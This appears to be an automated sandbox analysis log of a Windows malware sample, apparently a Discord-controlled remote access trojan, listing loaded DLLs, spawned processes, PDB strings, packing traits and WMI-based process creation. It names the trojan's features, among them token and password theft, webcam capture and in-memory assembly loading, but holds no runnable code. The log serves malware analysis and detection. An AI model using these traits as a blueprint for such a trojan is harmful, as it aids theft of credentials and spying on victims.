Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Automated click: OK
Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exe	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\87Bym0x4Fy.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Uninstall Information\cmd.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Uninstall Information\ebf1f9fa8afd6d

Source: 87Bym0x4Fy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 87Bym0x4Fy.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 87Bym0x4Fy.exe

Static file information: File size 22314496 > 1048576

Source: 87Bym0x4Fy.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1547400

Source: 87Bym0x4Fy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb3+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 0000000D.00000000.1756787728.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, Build.exe, 0000000D.00000002.1789958310.0000000000B76000.00000002.00000001.01000000.0000000E.sdmp, s.exe, 00000015.00000000.1819435912.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000002.1899493574.0000000000583000.00000002.00000001.01000000.0000001B.sdmp, s.exe, 00000015.00000003.1830651243.000000000718F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb-F424491E3931}\InprocServer32" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF3C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb$ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 0000000F.00000003.1802145844.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\Discord rat.pdbS source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: *indoC:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.pdbpdbtem.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb" source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdbBAz source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: 8C:\Windows\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\Discord rat.pdbi source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *assembly\GAC_64C:\Users\user\AppData\Roaming\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Discord rat.pdbpdbp.GAw source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbk*_ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 0000000F.00000003.1801258378.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: RuntimeBroker.exe, 00000005.00000003.1722658950.0000024CBA22D000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000007.00000002.1781080365.00007FFE0C0C1000.00000002.00000001.01000000.0000000A.sdmp, hacn.exe, 0000000F.00000003.1784627169.0000019333653000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000010.00000003.1786292411.000001470368F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000012.00000002.2009594706.00007FFE01221000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 0000000F.00000003.1786865207.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDB source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbCiV source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\Discord rat.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *pC:\Users\user\AppData\Roaming\RuntimeBroker2.0.PDBp source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000012.00000002.1997269204.00007FFDEFB6F000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF72000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Discord rat.pdbpdbrat.pdb91 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Discord rat.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 0000000F.00000003.1787224261.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 0000000F.00000003.1784977486.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb%+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\maxim\Desktop\Discord rat c#\Discord rat\obj\Release\Discord rat.pdb source: 87Bym0x4Fy.exe, 00000000.00000002.1723649047.00000000039D1000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp, RuntimeBroker2.0.exe, 00000006.00000000.1716966909.000002227B642000.00000002.00000001.01000000.00000007.sdmp, RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF2A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RuntimeBroker2.0.PDB? source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 0000000F.00000003.1787585583.0000019333653000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Discord rat.pdb+ source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb&0 source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFA7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DFBD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users.pdb source: RuntimeBroker2.0.exe, 00000006.00000002.1972606557.0000002A033F1000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbe source: RuntimeBroker2.0.exe, 00000006.00000002.2050319466.000002227DF53000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: LoadDll System.Reflection.Assembly.Load(byte[])
Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: password
Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: webcampic
Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: select_cam
Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: get_cams
Source: RuntimeBroker2.0.exe.0.dr, Program.cs	.Net Code: get_tokens

Source: RuntimeBroker2.0.exe.0.dr

Static PE information: 0xD6D709DC [Mon Mar 20 18:56:28 2084 UTC]

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\rbycypt0\rbycypt0.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1ffbxq0\r1ffbxq0.cmdline"

Source: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe

File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_6417140

Source: select.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x927e
Source: unicodedata.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x4d519
Source: python310.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x179482
Source: _socket.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x16097
Source: based.exe.13.dr	Static PE information: real checksum: 0x5df94e should be: 0x5ec614
Source: libcrypto-1_1.dll.5.dr	Static PE information: real checksum: 0x0 should be: 0x118790
Source: _bz2.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x190ae
Source: _decimal.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x241ea
Source: s.exe.15.dr	Static PE information: real checksum: 0x0 should be: 0x62099a
Source: _hashlib.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x14a50
Source: _lzma.pyd.5.dr	Static PE information: real checksum: 0x0 should be: 0x2099b

Source: Build.exe.5.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.5.dr	Static PE information: section name: _RDATA
Source: hacn.exe.13.dr	Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll.15.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.15.dr	Static PE information: section name: .00cfg
Source: python310.dll.15.dr	Static PE information: section name: PyRuntim
Source: s.exe.15.dr	Static PE information: section name: .didat

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B78D2A5 pushad ; iretd	3_2_00007FFD9B78D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B8A0972 push E85E515Dh; ret	3_2_00007FFD9B8A09F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B97180C push esp; ret	3_2_00007FFD9B9719BB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B976605 push esp; ret	3_2_00007FFD9B97662B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B971411 push esp; ret	3_2_00007FFD9B971433
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B972E11 push esp; ret	3_2_00007FFD9B972E33
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9753E0 push edx; ret	3_2_00007FFD9B9753E3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9715DD push esp; ret	3_2_00007FFD9B9715FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9791EA push esp; ret	3_2_00007FFD9B9791EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9717EA push esp; ret	3_2_00007FFD9B9717EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9715FC push esp; ret	3_2_00007FFD9B9715FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B976053 push esp; ret	3_2_00007FFD9B9761B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B972E54 push esp; ret	3_2_00007FFD9B9730CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B972E54 push esp; ret	3_2_00007FFD9B97332B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B978051 push edx; ret	3_2_00007FFD9B9780DB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B977052 push ebx; ret	3_2_00007FFD9B977053
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B97364D push esp; ret	3_2_00007FFD9B973673
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B970B82 push edx; ret	3_2_00007FFD9B970B83
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B97797D push ebx; ret	3_2_00007FFD9B977A03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B97738C push esp; ret	3_2_00007FFD9B97736B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B972598 push esp; ret	3_2_00007FFD9B97259B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B976D98 push edx; ret	3_2_00007FFD9B976D9B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B978569 push esp; ret	3_2_00007FFD9B97858B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B974BC2 push esp; ret	3_2_00007FFD9B974BC3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B975FBD push esp; ret	3_2_00007FFD9B975FDB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9759CC push esp; ret	3_2_00007FFD9B9759CB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9739D1 push esp; ret	3_2_00007FFD9B9739F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9761CD push esp; ret	3_2_00007FFD9B9761B3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B970BDC push esp; ret	3_2_00007FFD9B970F23
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B9719DC push esp; ret	3_2_00007FFD9B971C3B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_00007FFD9B975FDC push esp; ret	3_2_00007FFD9B975FDB

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
